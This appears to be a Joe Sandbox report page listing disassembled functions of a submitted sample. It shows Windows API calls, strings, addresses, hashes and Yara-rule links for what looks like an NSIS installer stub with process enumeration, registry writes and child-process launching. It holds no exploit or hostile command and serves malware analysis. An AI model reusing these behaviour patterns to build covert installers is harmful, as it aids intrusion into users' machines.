Module32NextW, xrefs: 004065DE
GetModuleBaseNameW, xrefs: 00406494
EnumProcessModules, xrefs: 0040648A
PSAPI.DLL, xrefs: 00406464
Kernel32.DLL, xrefs: 0040659B
CreateToolhelp32Snapshot, xrefs: 004065B5
Unknown, xrefs: 004064FC
Module32FirstW, xrefs: 004065D3
Process32FirstW, xrefs: 004065BD
Process32NextW, xrefs: 004065C8

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68

Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
GetDlgItem.USER32(?,000003E8), ref: 00404181
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
GetSysColor.USER32(?), ref: 004041AF
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
lstrlenW.KERNEL32(?), ref: 004041D6
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2

Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004

GetDlgItem.USER32(?,0000040A), ref: 0040424A
SendMessageW.USER32(00000000), ref: 00404251
GetDlgItem.USER32(?,000003E8), ref: 0040427E
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
SetCursor.USER32(00000000), ref: 004042D2
ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
SetCursor.USER32(00000000), ref: 004042F6
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337

Strings

open, xrefs: 004042DF
@%F, xrefs: 004042A7
N, xrefs: 0040426C

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: @%F$N$open
API String ID: 3928313111-3849437375
Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99

Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1

Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
wsprintfA.USER32 ref: 00406B4D
GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
GlobalFree.KERNEL32(00000000), ref: 00406C52
CloseHandle.KERNEL32(?), ref: 00406C5C

Strings

%s=%s, xrefs: 00406B43
NUL, xrefs: 00406A9E
[Rename], xrefs: 00406BC8, 00406BD7
F, xrefs: 00406AE8

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: F$%s=%s$NUL$[Rename]
API String ID: 565278875-1653569448
Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98

Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 00406195, 0040619A, 004061A1, 004061B0

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-2769509956
Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD

Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
GetSysColor.USER32(00000000), ref: 00403E00
SetTextColor.GDI32(?,00000000), ref: 00403E0C
SetBkMode.GDI32(?,?), ref: 00403E18
GetSysColor.USER32(?), ref: 00403E2B
SetBkColor.GDI32(?,?), ref: 00403E3B
DeleteObject.GDI32(?), ref: 00403E55
CreateBrushIndirect.GDI32(?), ref: 00403E5F

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94

Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: %s not found in %s, xrefs: 0040249A
Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Error registering DLL: Could not load %s, xrefs: 004024DB

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
API String ID: 1033533793-945480824
Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: success ("%s"), xrefs: 00402263
Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: command="%s", xrefs: 00402241

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D

Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
GetMessagePos.USER32 ref: 00404871
ScreenToClient.USER32(?,?), ref: 00404889
SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1

Strings

f, xrefs: 0040489D

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00012000,00000064,?), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
